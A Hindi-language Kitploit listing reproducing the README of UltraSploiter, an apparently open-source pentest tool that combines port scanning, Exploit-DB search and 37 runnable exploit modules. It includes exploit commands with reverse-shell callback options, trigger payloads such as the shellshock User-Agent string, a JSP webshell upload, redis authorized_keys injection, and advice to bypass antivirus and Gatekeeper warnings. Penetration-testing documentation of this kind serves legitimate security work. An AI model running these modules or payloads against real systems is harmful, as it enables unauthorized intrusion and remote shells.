Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ultrasploiter — एक ही बाइनरी जो एक पोर्ट स्कैनर, पूर्ण Exploit-DB इंडेक्स (47k प्रविष्टियाँ) और चलाने योग्य एक्सप्लॉइट मॉड्यूल को एक टूल में समाहित करती है। Rust में लिखा गया, Linux, Windows और macOS पर चलता है। | Kitploit
उपकरण/GitLabGitLab/vqkro/ultrasploiter
भेद्यता परीक्षण फ्रेमवर्कटोहीभेद्यता स्कैनरशोषण फ्रेमवर्कनेटवर्क मैपिंगपोर्ट स्कैनिंगशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
1013घं 8मि पहलेअभी तक समीक्षित नहीं
GitLabvqkro/ultrasploiter

ultrasploiter

एक ही बाइनरी जो एक पोर्ट स्कैनर, पूर्ण Exploit-DB इंडेक्स (47k प्रविष्टियाँ) और चलाने योग्य एक्सप्लॉइट मॉड्यूल को एक टूल में समाहित करती है। Rust में लिखा गया, Linux, Windows और macOS पर चलता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

UltraSploiter

स्कैन, मैच, एक्सप्लॉइट — एक IP अंदर, शेल बाहर।

एक ही बाइनरी जो पोर्ट स्कैनर, पूरे Exploit-DB इंडेक्स, और रन करने योग्य एक्सप्लॉइट मॉड्यूल्स के सेट को एक टूल में समेटती है। Linux, Windows और macOS पर चलती है।

कामआम तौर परयहाँ
होस्ट पर सर्विस ढूँढनाnmapUltraSploiter scan <ip>
एक्सप्लॉइट खोजनाsearchsploitUltraSploiter search <kw>
उन्हें चलानाmsfconsoleUltraSploiter exploit <ip> <module>

UltraSploiter मेन्यू


इंस्टॉल

सबसे आसान और सबसे अच्छा तरीका है कि तैयार बाइनरी डाउनलोड करके चला दें। कुछ भी इंस्टॉल करने की ज़रूरत नहीं, कोई डिपेंडेंसी नहीं — एक ही सेल्फ-कंटेन्ड फ़ाइल।

Releases पेज से डाउनलोड करें:

  • Windows — UltraSploiter-windows-x86_64.exe → डबल-क्लिक करें
  • Linux — UltraSploiter-linux-x86_64
  • macOS — अभी कोई तैयार बाइनरी नहीं; एक कमांड में बनाएँ (नीचे)

ध्यान दें: सिक्योरिटी टूल्स फ़्लैग हो जाते हैं। Windows SmartScreen और एंटीवायरस संभवतः बाइनरी को चेतावनी देंगे या क्वारंटीन कर देंगे — More info → Run anyway पर क्लिक करें, या अगर इसे रखना है तो एक्सक्लूज़न जोड़ें।

Windows

UltraSploiter.exe पर डबल-क्लिक करें। मेन्यू खुल जाएगा।

अगर SmartScreen अज्ञात पब्लिशर की चेतावनी दे (किसी भी अनसाइन्ड बाइनरी के लिए देगा), तो More info → Run anyway पर क्लिक करें।

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

अगर Gatekeeper इसे ब्लॉक करे (फिर से, कोई भी अनसाइन्ड बाइनरी), तो या तो राइट-क्लिक → Open, या एक बार क्वारंटीन फ़्लैग हटा दें:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

सोर्स से बिल्ड करें

सिर्फ़ तब ज़रूरी है जब आपके प्लेटफ़ॉर्म के लिए कोई बाइनरी न हो, या आप इसमें बदलाव करना चाहते हों। Rust 1.74+ आवश्यक है।

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1 stable-x86_64-pc-windows-gnu टूलचेन का उपयोग करता है, जो MinGW से लिंक होता है — इसलिए आपको Visual Studio या MSVC की ज़रूरत नहीं। अगर वह टूलचेन मौजूद न हो तो यह उसे इंस्टॉल कर देता है। अगर आपके पास पहले से MSVC Build Tools हैं, तो सादा cargo build --release भी काम करेगा।

Windows + GNU ध्यान दें: windows-sys (जिसे tokio खींचता है) dlltool को कॉल करता है, जो असेंबलर as को शेल आउट करता है — और rust-mingw कंपोनेंट as नहीं देता। build.ps1 %~dp0tools\mingw64\bin और %USERPROFILE%\tools\mingw64\bin में ऐसा MinGW bin ढूँढता है जिसमें यह मौजूद हो, और मिलने पर उसे PATH में आगे जोड़ देता है। अगर error calling dlltool आए तो वहाँ winlibs बिल्ड रखें। MSVC टूलचेन प्रभावित नहीं होते।


इसे चलाएँ

बिना किसी आर्ग्युमेंट के आपको मेन्यू मिलता है:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

कमांड लाइन

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

Linux/macOS पर, ./ लगाएँ (जैसे ./UltraSploiter scan 10.0.0.5)।

स्कैन फ़्लैग

फ़्लैगअर्थ
-p <spec>top (1000), 80,443, 1-1024, - (सभी)
-T0..-T5टाइमिंग टेम्पलेट — धीमा/शांत से तेज़/शोरगुल तक
-sUUDP प्रोब स्कैन
-sVसर्विस/वर्ज़न डिटेक्शन (डिफ़ॉल्ट रूप से चालू)
--no-bannerबैनर ग्रैबिंग छोड़ें
--jsonstdout पर JSON
-oX <file>nmap-शैली XML

स्कैनर असिंक्रोनस (tokio) है: प्रत्येक -T लेवल तय करता है कि एक बार में कितने सॉकेट इन-फ़्लाइट होंगे (-T5 पर 8000 तक), इसलिए यह nmap top-1000 को कुछ सेकंड में कवर कर लेता है। हर "open" एक पूर्ण TCP हैंडशेक है, इसलिए परिणाम सटीक होते हैं।

ऑप्शन (-o key=value)

keyकिसके द्वारा उपयोगअर्थ
lhost, lportrev-shell मॉड्यूलकॉलबैक पता
rportweb मॉड्यूलHTTP पोर्ट ओवरराइड करें
pathshellshock, struts, phpunitएंडपॉइंट पथ
user, passtomcat_managerमैनेजर क्रेडेंशियल
coresolr_rceSolr core नाम
filegrafana_lfiपढ़ने के लिए फ़ाइल
ssh_pubkeyredis_unauthauthorized_keys में डालने के लिए key
src, dstproftpd_modcopyसोर्स / डेस्टिनेशन कॉपी करें
timeoutसभीसॉकेट टाइमआउट सेकंड

एक्सप्लॉइट डेटाबेस

search और info पूरे Exploit-DB इंडेक्स — 47,000+ एंट्रीज़ (वही डेटासेट जो searchsploit उपयोग करता है) पर आधारित हैं, जो बाइनरी में बंडल है। जब किसी एंट्री में ऐसा CVE हो जिसे कोई रन करने योग्य मॉड्यूल लागू करता है, तो info दोनों को लिंक कर देता है:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

रन करने योग्य मॉड्यूल (37)

मॉड्यूलCVEट्रिगर
vsftpd_234CVE-2011-2523:) यूज़रनेम → 6200 पर root bind shell
unrealircd_backdoorCVE-2010-2075IRC पर AB; <cmd>
distcc_execCVE-2004-2687DIST प्रोटोकॉल कंपाइलर आर्ग्युमेंट
proftpd_modcopyCVE-2015-3306SITE CPFR/CPTO फ़ाइल कॉपी
redis_unauth—CONFIG SET एक key या cron एंट्री लिखता है
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638Content-Type में OGNL
tomcat_putCVE-2017-12615एक JSP webshell PUT करें
tomcat_manager—/manager के ज़रिए WAR डिप्लॉय करें
elasticsearch_groovyCVE-2015-1427_search में Groovy RCE
drupalgeddon2CVE-2018-7600Form API render callback
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000अनऑथेंटिकेटेड /script Groovy
solr_rceCVE-2019-17558stream.body में Velocity टेम्पलेट
grafana_lfiCVE-2021-43798प्लगइन पाथ ट्रैवर्सल फ़ाइल रीड
webmin_backdoorCVE-2019-15107password_change.cgi एक वैल्यू को शेल में पाइप करता है
php_cgi_arg_injectionCVE-2012-1823क्वेरी स्ट्रिंग के ज़रिए -d auto_prepend_file

प्रत्येक एक नॉन-डिस्ट्रक्टिव check() और एक run() लागू करता है।

कैटलॉग मॉड्यूल (डेटा-ड्रिवन)

ये छोटे JSON रेसिपी हैं जिन्हें data/catalog.json में कैटलॉग इंजन चलाता है। एक मॉड्यूल जोड़ना ~8 लाइन का डेटा है, नई सोर्स फ़ाइल नहीं:

टूल डाउनलोड करें